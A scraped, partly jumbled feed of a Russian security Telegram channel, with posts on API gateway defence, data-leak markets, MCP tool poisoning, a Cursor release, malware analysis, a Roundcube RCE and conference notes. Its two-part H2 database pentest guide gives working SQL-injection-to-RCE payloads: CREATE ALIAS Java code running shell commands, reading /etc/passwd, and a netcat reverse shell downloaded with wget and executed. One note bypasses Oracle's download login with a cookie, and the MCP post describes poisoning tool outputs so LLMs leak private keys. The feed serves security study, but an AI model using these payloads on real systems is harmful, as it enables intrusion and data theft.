All materials published on the channel are for educational and informational purposes only. Чат: @poxek_chat Админ: @szybnev Рекламный менеджер: @not_savely Купить рекламу: https://telega.in/c/poxek РКН: https://clck.ru/3FsVhp
😊 API Gateway как линия фронта в Web3
Внимание: CatSwap в этом тексте — не стартап и не “очередной ”, а наш pet-проект для иллюстрации. Он нужен, чтобы показать, как Web3-сервисы должны мыслить в части защиты API — не опираясь на бэкэнд, а начиная с Gateway.
envoy.filters.http.jwt_authn
;/v1/quote ≤ 1000 r/m
; /v1/swap ≤ 100 r/m
;path
, key
, user_id
, latency
, tx_hash
);score > 0.8
; алёрты в SIEM/Slack.detection → containment → eradication → recovery
;Под капотом Госуслуг: как защищают системы, от которых зависит работа цифрового государства
#госуслуги #compliance #ГОСТ #ГИС #аудит #аттестация
Предисловие от меня: про бумажную безопасность и нет, это не хрень бесполезная, как многие считают)
Цифровизация госсектора привела к появлению сервисов, которые упростили взаимодействие граждан с государством. Яркий пример — портал Госуслуг, работа которого опирается на обширную инфраструктуру государственных информационных систем (ГИС).
В России действуют сотни федеральных, региональных и муниципальных ГИС, без которых невозможно представить работу органов власти. Часть из них напрямую используется гражданами, другие работают в фоновом режиме, обеспечивая интеграцию и автоматизацию процессов. Кроме того, появляются информационные системы, которые формально не являются ГИС, но тесно с ними связаны.
Оборотной стороной цифровизации становятся риски кибербезопасности. В случае с ГИС ставки чрезвычайно высоки, ведь в таких системах агрегируются персональные данные миллионов пользователей и чувствительная для госструктур информация. Поэтому защита ГИС требует специфического подхода и регулирования со стороны ФСТЭК и ФСБ.
На связи Максим Кузнецов, руководитель отдела защиты информации ГИС в Бастионе. Сегодня расскажу об особенностях защиты ГИС и о том, с какими сложностями мы сталкиваемся в таких проектах.
🔗Читать полностью
🌚 @poxek | 🌚 Блог | 📺 poxek_official/videos">YT | 📺 RT | 📺 poxek_official">VK | 🌚 Мерч
Данные на продажу: что происходит с информацией после утечек
#утечки #сливы #leak #leaks #РКН
Новости о крупных утечках данных больше никого не удивляют. Компании вкладывают миллионы в безопасность, проводят аудиты, но число таких инцидентов продолжает расти. Только в 2024 году Роскомнадзор зафиксировал 135 утечек — это более 710 миллионов записей о россиянах в базах данных. Но что происходит с данными после взлома? Куда они утекают? Кто и как их покупает?
Большинство новостей на тему утечек ограничиваются банальным «взломали, утекло, делайте выводы». Но утечка данных — это не конец истории, а только ее начало. После взлома данные начинают жить своей жизнью: их разбивают на части, объединяют с другими базами, разыгрывают на аукционах. Теневой рынок, построенный вокруг сбыта таких данных, напоминает отдельную экосистему, которая до сих пор слабо изучена даже среди ИБ-специалистов.
В этой статье разберем, как на практике выглядит жизненный цикл украденных данных. Представьте: вы — опытный специалист по киберразведке, помогающий компаниям справляться с последствиями утечек. Ранним июньским утром вас будит внезапный телефонный звонок. На другом конце провода — гендиректор ООО «Нас никогда не взломают». Судя по голосу, он явно встревожен...
🔗Читать полностью
🌚 @poxek | 🌚 Блог | 📺 poxek_official/videos">YT | 📺 RT | 📺 poxek_official">VK | 🌚 Мерч
Ни один вывод с вашего сервера MCP не является безопасным
#MCP #AI #Anthropic #LLM #TPA #ATPA #FSP #pentest #research
Исследование CyberArk показало: MCP (Model Context Protocol) от Anthropic уязвим не только к классическим атакам Tool Poisoning (TPA), когда вредоносный код внедряют в описание инструмента, но и к Full-Schema Poisoning (FSP). Теперь атаковать можно любые поля схемы — имена параметров, типы, обязательные поля и даже новые незадокументированные элементы. Самое опасное — Advanced Tool Poisoning Attack (ATPA): вредоносная логика внедряется в вывод инструмента или сообщения об ошибках. LLM, считая их легитимными, может раскрывать чувствительные данные (например, приватные ключи) или выполнять вредоносные действия. Такие атаки сложно обнаружить — они могут активироваться только в продакшене и выглядеть безобидно на этапе тестирования. Вывод: доверять MCP-серверам нельзя, проверять нужно все поля и любые ответы инструментов
🔗Читать полностью
🌚 @poxek | 🌚 Блог | 📺 poxek_official/videos">YT | 📺 RT | 📺 poxek_official">VK | 🌚 Мерч
Релиз Cursor 1.0
#vibecoding #coding #cursor #AI #MCP
TLDR: В этом релизе представлен BugBot для проверки кода, новую фичу memories, настройка MCP в один клик, поддержка Jupyter, backgound agent вышел из беты и новый UI настроек Cursor.
1️⃣BugBot
Раньше была фича с ручной проверкой pull request в git на наличие багов. Было удобно, но видимо многие забыли её тыкать. Теперь эта функция автоматическая, если есть какие-то баги, то можно тыкать Fix in Cursor уже в самом Gitlab/Github и вам откроет Cursor на десктопе с заготовленным промптом под конкретную проблему. Как настроить - читайте доку. Мне эта фича и раньше нравилась, т.к. она по мимо сообщения о потенциальном баге, писала вероятность его "правдивости".
Оно всё равно платное осталось. Триалка на 7 дней! Дальше тратится, как за использование Max моделей.
2️⃣Background Agent для всех
Сама по себе это фича, которая позволяла выполнять агентские промпты в фоне распараллельно. Но она была в бете и обязывала выключить Privacy режим, что я даже на своих личных проектах не хотел делать, ведь это означало 100% слив своей кодовой базы в Cursor. Пункт про Privacy к сожалению пока ешё действует, т.к. команде нужно получить максимум фидбеке о её работе. Но если хотите побаловаться, то активировать можно, либо CMD/Ctrl+E или по иконке облачке справа сверху.
3️⃣Обновление для Data Science. Поддержка Jupyter Notebooks
Я лично эту обнову не очень понимаю, т.к. мой мир и мир Data Science явно находятся по разным берегам, но: Агент теперь может создавать и редактировать несколько ячеек непосредственно в Jupyter, что является значительным улучшением для исследовательских задач и задач по изучению данных. Пока эта фича доступна только с моделями Sonnet.
4️⃣Memories
Чтобы было понятно, что это за фича. Вспомните когда OpenAI релизнуло в ChatGPT общую память между чатами и возможность её изменения. По сути очень схожая фича, но пока в бете. Возможно я пока не вижу её потенциал, но я выработал лайфхак, чтобы переносить память между чатами: Напиши summary нашего диалога из этого чата, чтобы я мог перенести всю важную информацию и в другой чат
.
5️⃣Установка MCP в один клик
На мой взгляд и так не возникало проблем ставить MCP в Cursor. Я раньше писа пост про безопасность MCP ТУТ. Собственнно от них не отказываюсь и лаббирую, что запускать MCP сервера надо в контейнерах. Как устанавливаются и запускаются они в новой версии Cursor, я пока ещё не протестил. Если появится инфа, то дополню пост. А также появилась возможность OAuth для этих же MCP, где требуется авторизация. Наверное чтобы не хранить API ключи локально.
6️⃣Улучшение ответов в чате
Эта обнова понравится людям-визуалам, которые любят таблички и диаграмки. Собственно это и добавляется прямо в чат, если попросить их сгенерировать. create Mermaid diagrams или Markdown tables.
7️⃣Минорное — обновление UI настроек Cursor IDE
Самое вкусное из этого на мой взгляд - это dashboard потраченных запросов, usage-based и сколько строк кода написано AI.
🔗Changelog
🌚 @poxek | 🌚 Блог | 📺 poxek_official/videos">YT | 📺 RT | 📺 poxek_official">VK | 🌚 Мерч
Гайд по пентесту СУБД H2. Первая часть
#H2 #Java #pentest #research #SQLi
ЧАСТЬ 1 - ЧАСТЬ 2
Родители, закройте детям глаза, дальше будет Java)
➡️Начнём с теории:
H2 — это легковесная, кроссплатформенная система управления реляционными базами данных с открытым исходным кодом, полностью написанная на Java. Она может работать как во встроенном режиме (embedded), так и в режиме клиент-сервер, поддерживает хранение данных в памяти (in-memory) и на диске, что делает её идеальным выбором для разработки, тестирования и небольших production-проектов.
Я думаю большинство с ней никогда не сталкивалось, вот и я вчера впервые с ней повстречался. В ходе ресерча ноликов ноликов в одном Java проекте, я дошёл до потенциальной SQLi и я решил сразу пойти покрутить SQLi > RCE. Попробовав дефолтные векторы из постгри (чисто на рефлексе), понял что оно не работает(
Пошёл читать доку и оказалось, что прямого вектора до RCE, как в популярных СУБД типа PostgreSQL или MySQL - нет. Пошёл читать доку и ...пригрустнул, т.к. судя по сайту, мне предстояла попа-боль и костыльные извращенства, что собственно и произошло.
Верификация наличия SQLi идёт по классике:
something' OR 1=1; --
# Получаем 200 OK
something' OR 1=2; --
# Получаем ошибку
import java.io.IOException;
public class Main {
public static void main(String[] args) throws IOException {
// Вызываем метод shell_exec() и выводим результат в консоль
System.out.println(shell_exec());
}
static String shell_exec() throws java.io.IOException {
// Выполняем команду "id" и создаём Scanner для чтения её вывода
java.util.Scanner cmd_output = new java.util.Scanner(Runtime.getRuntime().exec("id").getInputStream()).useDelimiter("\\A"); // Устанавливаем разделитель так, чтобы Scanner читал весь ввод целиком
// Если есть данные в выводе команды, возвращаем их, иначе — пустую строку
return cmd_output.hasNext() ? cmd_output.next() : "";
}
}
something' OR 1=1; DROP ALIAS IF EXISTS exec_cmd; CREATE ALIAS exec_cmd AS 'String shell_exec() throws java.io.IOException {
java.util.Scanner cmd_output = new java.util.Scanner(Runtime.getRuntime().exec("id").getInputStream()).useDelimiter("\\\\A");
return cmd_output.hasNext() ? cmd_output.next() : "";
}'; UPDATE comments SET comment = exec_cmd() WHERE id = 13c60101-8142-42df-bebd-fb5905673c41; --
id
, но если что-то не сработало, то будет пустой комментарий. Почему может не сработать? Возможно урезанное окружение, а может права выставлены корректно и СУБД не может выполнять системные команды. Попробуйте другие команды, если вдруг не получилось.#note
Oracle давно закрыла возможность скачивания своих файлов без авторизации. Я сейчас снова с этим столкнулся и нашёл способ, как это обойти:
1. Простой способ. Обход через куку
wget -c --no-cookies --no-check-certificate --header "Cookie: oraclelicense=accept-securebackup-cookie" https://download.oracle.com/java/17/archive/jdk-17.0.12_linux-x64_bin.tar.gz
Эти доклады отметил для себя как полезные и годные. Но другие доклады тоже хороши.
На самом деле давно не был на конфе, когда не понимаешь даже половину слов спикера и ... меня это радует, т.к. это значит есть развиваться)
Следующий спикер уже на сцене! Дмитрий Рыбалка, Lamoda Tech. "Talos Linux в production: без SSH и с удовольствием".
Читать полностью…Дмитрий Евдокимов переходит к своему докладу: "Неочевидные и непонятные моменты безопасности Kubernetes".
Читать полностью…Reverse Engineer Android Apps for API Keys
#android #reverse #RE #mobile #pentest #API
Статья с pwn.guide посвящена основам реверс-инжиниринга и цифровой криминалистики (форензики) приложений под Android. В ней рассматриваются ключевые этапы анализа мобильных приложений, важные инструменты и практические советы для начинающих и опытных специалистов по информационной безопасности.
➡️Основные моменты статьи:
➡️Описывается структура Android-приложений (APK-файлов), их компоненты и способы упаковки.
➡️Даётся обзор инструментов для реверса и форензики Android, включая такие популярные решения, как Apktool, Androguard, jadx, а также специализированные forensic-утилиты вроде androick и backhack.
➡️Пошагово разбирается процесс декомпиляции APK-файла, извлечения ресурсов, анализа манифеста и кода, поиска уязвимостей и вредоносных функций.
➡️Приводятся советы по анализу разрешений, трекеров и подозрительных библиотек, а также по выявлению признаков компрометации или вредоносной активности.
➡️Рассматриваются методы динамического анализа, включая запуск приложения на эмуляторе, мониторинг сетевых запросов и взаимодействие с файловой системой.
Даются рекомендации по автоматизации анализа с помощью скриптов и интеграции различных инструментов.
➡️Необходимый тулинг
Android Studio — For running and testing APKs.
ADB — For interacting with Android devices or emulators.
APKTool — For decompiling and recompiling APKs.
JADX — For decompiling APKs to Java source code.
HTTP Toolkit — For intercepting and analyzing HTTP/HTTPS traffic.
Кому будет полезна статья:
Материал рассчитан на специалистов по кибербезопасности, исследователей вредоносных программ, а также всех, кто интересуется анализом безопасности мобильных приложений Android.
🔗 Читать далее
🌚 @poxek | 🌚 Блог | 📺 poxek_official/videos">YT | 📺 RT | 📺 poxek_official">VK | 🌚 Мерч
🔎 Эксперты Curator обнаружили крупнейший DDoS-ботнет — 4,6 миллиона устройств
16 мая специалисты Curator зафиксировали и нейтрализовали масштабную DDoS-атаку, в которой использовался огромный ботнет — крупнейший за всю историю наблюдений. Он включал 4,6 млн устройств — это в разы превышает рекорды прошлых лет: для сравнения, в 2023 году — 136 тыс. устройств, а в 2024 — 227 тыс.
Атака проходила в несколько этапов:
⚡️ На первом этапе — чуть больше 2 млн устройств
⚡️ На втором — еще 1,5 млн
⚡️ На третьем — дополнительно 1 млн устройств, всего 4,6 млн
С данным ботнетом эксперты компании Curator уже сталкивались ранее в этом году — тогда его размер составлял 1,33 млн устройств. Сейчас он вырос более чем втрое, что свидетельствует о его активном развитии и повышении угрозы.
🌍 География ботнета:
🇧🇷 Бразилия — 1,37 млн устройств
🇺🇸 США — 555 тыс.
🇻🇳 Вьетнам — 362 тыс.
🇮🇳 Индия — 135 тыс.
🇦🇷 Аргентина — 127 тыс.
Такой ботнет обладает потенциалом генерировать десятки миллионов запросов в секунду. Подобная нагрузка может запросто вывести из строя любой онлайн-ресурс. Не каждый провайдер DDoS-защиты сможет с ней справиться.
👉 Оставайтесь на шаг впереди угроз — следите за новостями и аналитикой в канале Curator
Реклама: ООО "ЭЙЧ-ЭЛЬ-ЭЛЬ", ИНН 7704773923
ИИ обошел 90% команд на соревновании хакеров
Исследователи из Palisade Research (это те, у которых недавно выходило вот это громкое исследование про саботаж моделей) сделали специальный AI-трек на двух недавних соревнованиях Capture The Flag от крупнейшей платформы Hack The Box. Суммарно участие принимали почти 18 тысяч человек и 8 500 команд. Из них несколько полностью состояли из ИИ-агентов. Вот что вышло:
➖ В первом небольшом соревновании (≈400 команд) четыре из семи агентов решили по 19 из 20 задач и вошли в топ 5 % участников
➖ Во втором большом CTF (≈8 000 команд) лучшему ИИ-агенту удалось захватить 20 флагов из 62 и оказаться в топ-10%
➖ При этом агенты справляются почти со всеми задачами, на которые человек тартит до часа времени, и делают это в разы быстрее
Одинаково неплохо моделям удавались и задачи на взлом шифра, и веб-взломы, и форензика, и эксплуатация уязвимостей 💀
Ну и экономический эффект тоже на месте. Если принять во внимание, что на одну команду из топ-5% обычно уходит не менее нескольких сотен человеко-часов на подготовку, анализ и написание эксплойтов, то даже самый дорогой агент, который работал 500ч, в итоге обошелся дешевле, чем 10 таких живых команд.
arxiv.org/pdf/2505.19915
Один из подписчиков задал вопрос в чате, какие у кого пет проекты. Пишите в комментариях, что пишите, ссылки на репозитории, если оно паблик, накидаем звездочек) Также расскажите, почему выбрали такой пет проект и какая мотивация его развивать.
А если нет пет проектов, то пофантазируйте, что хотелось бы написать)
Прочитаю все комменты)
🌚 @poxek
Новые атаки GOFFEE: разбор Kill Chain и анализ вредоносного ПО
#reverse #malware #killchain #forensic #форензика
В прошлом и нынешнем году коллеги из «Лаборатории Касперского» и BI.Zone рассказывали о группировке GOFFEE (Paper Werewolf). В конце мая автор статьи снова фиксировали ее активность, но немного в другом обличии — можно сказать, в новой овечьей шкуре. Автор статьи Никита Полосухин, ведущий аналитик центра мониторинга и реагирования на кибератаки, и я расскажу, как сейчас действует GOFFEE и как обнаружить их присутствие в инфраструктуре.
Что изменилось?
Итак, сначала к главному:
У вредоносного документа во вложении фишингового письма имеется уязвимость загрузки удаленных шаблонов СVE-2017-0199. Полезная нагрузка, как и ранее, находится в самом документе, закодированная в base64, но вредоносный макрос, который запускает ее, теперь скачивается в шаблоне.
PowerModul загружает основную нагрузку в память через [System.Reflection.Assembly]::Load, что не встречалось в атаках этой группировки в прошлом.
🔗А теперь — разбор.
🌚 @poxek | 🌚 Блог | 📺 poxek_official/videos">YT | 📺 RT | 📺 poxek_official">VK | 🌚 Мерч
🔥 9.9 Critical
Post Auth RCE для Roundсube
Небезопасная десериализация. Инжектится через GET-параметр _from
, — в Roundcube он указывает на раздел, куда надо вернуться, после отправки сообщения.
?_task=settings&_action=upload&_from=mail%2Finbox
_from
сериализованным объектом.rcube_pgp_engine → Crypt_GPG_Engine
.unserialize()
.В кроличьей норе. Штурмуем отладочную консоль «Яндекс Станции»
#IDA #reverse #Яндекс #IoT #железо #hardware
Эта статья появилась в процессе реверса прошивок «Яндекс Станций». Автор провел реверс U-Boot процессора умной колонки и создал утилиту для его извлечения из расшифрованного загрузчика. Способ универсален для всех подобных устройств и, возможно, других гаджетов с чипом Amlogic.
Разработанный мной метод подойдет для:
➡️«Станции Mini2» (YNDX-00020/21);
➡️«Станции Lite» (YNDX-00025);
➡️«Станции Max» (YNDX-00053/0008);
➡️других устройств на Amlogic S905X2 (G12) и A113X (AXG).
В процессе автор расскажу о паре интересных плагинов для IDA: с помощью Diaphora мы позаимствуем информацию из схожего опенсорсного проекта, а FindCrypt поможет нам отыскать криптографические константы.
🔓 Читать далее
🌚 @poxek | 🌚 Блог | 📺 poxek_official/videos">YT | 📺 RT | 📺 poxek_official">VK | 🌚 Мерч
Гайд по пентесту СУБД H2. Вторая часть
#H2 #Java #pentest #research #SQLi
ЧАСТЬ 1 - ЧАСТЬ 2
2️⃣ Удобный, но более жирный по коду вектор
Ещё в прошлом примере мы делали unalias на возможно существующую команду, на всякий случай. Теперь же мы создадим свой alias и будем его использовать.
CREATE ALIAS EXEC AS
'String e(String cmd) throws java.io.IOException {
// Формируем массив аргументов для выполнения команды в bash:
String[] c = {"/bin/bash", "-c", cmd};
// Запускаем процесс с указанной командой
Process p = Runtime.getRuntime().exec(c);
// Получаем поток вывода (stdout) запущенного процесса
java.io.InputStream stdIn = p.getInputStream();
// Оборачиваем InputStream в InputStreamReader для чтения символов
java.io.InputStreamReader isr = new java.io.InputStreamReader(stdIn);
// Оборачиваем InputStreamReader в BufferedReader для построчного чтения
java.io.BufferedReader br = new java.io.BufferedReader(isr);
// Переменная для накопления всего вывода команды
String result = "";
// Временная переменная для чтения текущей строки
String line = "";
// Считываем строки из вывода процесса до тех пор, пока они есть
while ((line = br.readLine()) != null)
// Добавляем каждую строку к результату (без перевода строки)
result += line;
// Возвращаем весь накопленный вывод команды как одну строку
return result;
}';
something' CALL EXEC('cat /etc/passwd'); --
# сначала пишем на rev shell в файл. Как пример:
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.10.10.10 9001 >/tmp/f" > shell.sh
python3 http.server
в папке, где хранится shell.sh
CALL EXEC('wget http://10.10.10.10:8080/shell.sh -O /tmp/shell.sh');
CALL EXEC('chmod +x /tmp/shell.sh');
CALL EXEC('bash /tmp/shell.sh');
Как AI-ассистенты открывают всему миру вашу почту и календарь
Всем привет!
Сегодня безумно популярна тема различных AI-агентов и в частности персональных AI-помощников, эдаких «Джарвисов» на минималках.
Эти помощники умеют читать и отправлять почту, ставить встречи в календарь и напоминать нам о них. И все это через удобный и привычный Телеграм!
Офигенно удобно, полезно и всячески ускоряет и упрощает нам жизнь! Если бы не одно но..
О том как создать такого ассистента и подключить его к своей почте есть огромное количество материалов, особенно видео на Youtube. Я посмотрел 10 наиболее популярных видео, у которых в сумме набирается около 700 000 просмотров.. И во всех есть один и тот же косяк!
Из-за неправильной настройки телеграм-тригера написать вашему «Джарвису» может кто угодно! И абсолютно также получить данные о письмах, контактах, встречах, написать письмо всем контактам и т.д. Любой человек, кто найдет вашего бота может получать любые данные! А учитывая, что многие сервисы осуществляют сброс пароля через подтверждение на почту, это может быть еще интереснее!!
Одна маленькая, скрытая настройка ставит под очень большой удар всю конфиденциальную информацию, что у нас есть 🎉
Я написал об этом небольшую статью и даже записал коротенькое видео, которое показывает, как это работает!
Надеюсь вам будет интересно узнать поподробнее, как это работает и как сделать вашего «Джарвиса» только вашим :)
До связи!
#aishe4ka #aiassistant #n8n
Подборка райтапов на #bootcamp #standoff365
🗂️Задание
- [web-1-1] Удаленное выполнение кода (RCE) на узле library.edu.stf
- [web-1-2] Локальное повышение привилегий (LPE) на узле library.edu.stf
➡️Райтап
[/channel/writeup_ctf/225]
🗂️Задание
- [web-3-1] Подделка запроса со стороны сервера (SSRF) на узле utils.edu.stf
➡️Райтап
[/channel/writeup_ctf/265]
- [web-3-2] Удаленное выполнение кода (RCE) на узле utils.edu.stf
➡️Райтап
[/channel/writeup_ctf/264]
🗂️Задание
- [web-4] Удаленное выполнение кода (RCE) на узле shop.edu.stf
➡️Райтап
[/channel/writeup_ctf/282]
🗂️Задание
- [web-5] Внедрение SQL-кода (SQLi) на узле tokenizer.edu.stf
➡️Райтап
[/channel/writeup_ctf/233]
🗂️Задание
- [web-6] Удаленное выполнение кода (RCE) на узле smashmusic.edu.stf
➡️Райтап
[/channel/writeup_ctf/450]
БОНУС: райтапы на категорию #infra
[/channel/writeup_ctf/282]
💬 Канал & Чат | 📺 RUTUBE | 📺 writeup_ctf?si=TX1b4ep75lAYIh7a">YouTube
Михаил Кожуховский, Flowmaster. "Чем собирать контейнеры если вы параноик?".
Читать полностью…Продолжаем! Альмир Сарваров, Банк ДомРФ. "Тонкая настройка безопасности OS Linux для контейнеров: вредно и полезно"
Читать полностью…БЕКОН 2025
Хорошая локация, даже тут знакомых встретил)
Что очень удобно, 1 трек и не надо никуда бегать за докладчиками.
На удивление довольно много людей, но в целом какой-то толпучки нет, стенды удобно расставлены.
Классный мерч в большинстве, возьму себе пару идей на вооружение)
А еще стащил кучу стикеров, которые буду вам раздавать на мероприятиях, которую буду посещать))
Всем привет! Долго думал над этой темой. Мой канал - это сообщество, что я смог объединить вокруг одной идеи, а это было нелегко подружить множество маленьких интровертиков в большую кампанию людей, которая будет каждый день заходить на канал и читать посты, а более смелые еще и общаются в чате.
Канал веду в соло 4 года, от чего начал уставать последнее время. Скорее не так... У меня банально закончились идеи о чем еще написать, поэтому я прошу помощи у вас.
Если у вас есть какие-то классные темы, но вам не хватает мотивации их дописать или внешней критики, вы не знаете куда выложить, думаете что её не заметят и любые другие отмазки, чтобы не поделиться своими знаниями, то я предлагаю свой канал в качестве площадки для публикации контента. Я знаю, что у меня есть множество талантливых и трудолюбивых подписчиков, которые имеют идеи для контента, но сами его не пишут по различным причинам. Собственно это тот самый шанс, чтобы круто самореализоваться)
Win2Win:
1. Вы получаете огласку, как специалиста. Вы можете поделиться своим мнением, ресерчем, может какой-то интересной идеей. Это отличная возможность засветится. В мое время такого не было)
2. Я получаю помощь в развитии и поддержке канала.
Первоначально я ищу людей, которые также горят схожими идеями в прокачке ИБ сообщества в России. Мне не интересно работать с айтишными контент менеджерами, SMM или людьми, которые нагенерят мне идей или контента через нейросети (я это и без вас могу сделать). Если мы с вами сработаемся в перспективе, то я с радостью буду вам платить.
Канал развивался всегда с ходом моих интересов. Думаю пришло время попробовать для себя что-то новое - делегирование) и посмотреть, что из этого выйдет.
Банальные правила по идеям для статей: никаких гайдов, как за 5 минут взломать ватсап/вк, гайд как взламывать wifi со смартфона и т.д. Если это очевидный материал, который уже лет 20 есть в интернете, то такое не интересует. За спам или какие-то блечерские истории, буду выдавать бан. Уважайте свое и мое время)
Писать @szybnev
Стажировка в InfoJet
#стажировка
https://jet.su/securitystart/
26 мая – 16 июня Регистрация
————————
Я не знаю почему ко мне не пришли их SMM, хотя я специально попросил их об этом. Это не реклама, мне не платили, я просто хочу поддержать коллег и чтобы мои подписчики, кто еще не работают, а хотят - наконец нашли своё месте в какой-нибудь компании)
P.s. на будущее для всех компаний, кто делает стажировки по кибербезу, приходите ко мне в ЛС @szybnev и обсудим как можно пропиарить вашу стажировку
Пентест провайдера. Как цепочка классических багов привела к полной компрометации
#RCE #pathtraversal #killchain
В этой статье автор поделится историей одного из выполненных мной проектов, который показал, что даже в наше время встречаются простые и базовые уязвимости, грамотное сочетание которых может привести к RCE.